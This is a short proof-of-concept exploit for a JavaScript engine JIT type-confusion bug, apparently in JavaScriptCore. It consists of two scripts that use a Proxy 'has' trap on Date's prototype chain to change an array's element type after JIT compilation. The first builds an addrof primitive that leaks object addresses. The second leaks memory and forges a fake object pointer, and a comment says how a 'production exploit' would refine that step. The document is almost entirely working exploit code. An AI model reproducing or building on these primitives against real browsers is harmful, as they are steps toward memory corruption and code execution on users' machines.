poc provided by Lucas

pepsiPoc.js

load("utils.js")
load("int64.js")

function addrof(obj) {

    let dateObj = new Date();
    dateObj[0] = 1;
    let array = new Array(13.37, 13.37)
    let triggerChange = false;
    Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
        has: function () {
            if (triggerChange) {
                array[1] = obj
            }
        }
    });
    function changeElement(localArray, localDateObj, floatArray) {
        localArray[0];
        let avoidRemoval = 0xbadbeef0 in localDateObj;
        floatArray[0] = localArray[1];
        return avoidRemoval;
    };
    let u32 = new Uint32Array(2);
    let f64 = new Float64Array(u32.buffer);
    for (let i = 0; i < 50000; i++) changeElement(array, dateObj, f64);
    triggerChange = true;
    changeElement(array, dateObj, f64);
    return u32[0] + (u32[1] * 0x100000000);
}
let x = {a: 1}
print(addrof(x).toString(16))

poc.js

let s = new Date(); //date
let confuse = new Array(13.37,13.37); //make array
s[0] = 1; //date array
let hack = 0; //toggle hack
Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {has: function() {
    if (hack) {
//        alert("side effect");
        confuse[1] = {};
    }
}}); // this doesn't trigger type conversion of |s| into SlowPutArrayStorage

function victim(oj,f64,u32,doubleArray) {
    doubleArray[0];
    let r = 5 in oj;
    f64[0] = f64[1] = doubleArray[1];
    u32[2] = 0x41414141;
    u32[3] = 0;
    // u32[2] += 0x18; < you'd use this for an actual production exploit in order to get a fake object rather than using 0x41414141
    doubleArray[1] = f64[1];
    return r;
}

let u32 = new Uint32Array(4);
let f64 = new Float64Array(u32.buffer);

for(let i=0; i<50000; i++) victim(s,f64,u32,confuse); // JIT compile
hack = 1;
victim(s,f64,u32,confuse);
if (u32[1] === 0x7ff80000) {
    print("failed");
}
print("infoleak: " + f64[0] + " (hex: 0x" + (u32[0]+u32[1]*0x100000000).toString(16) + ")");
confuse[1][0];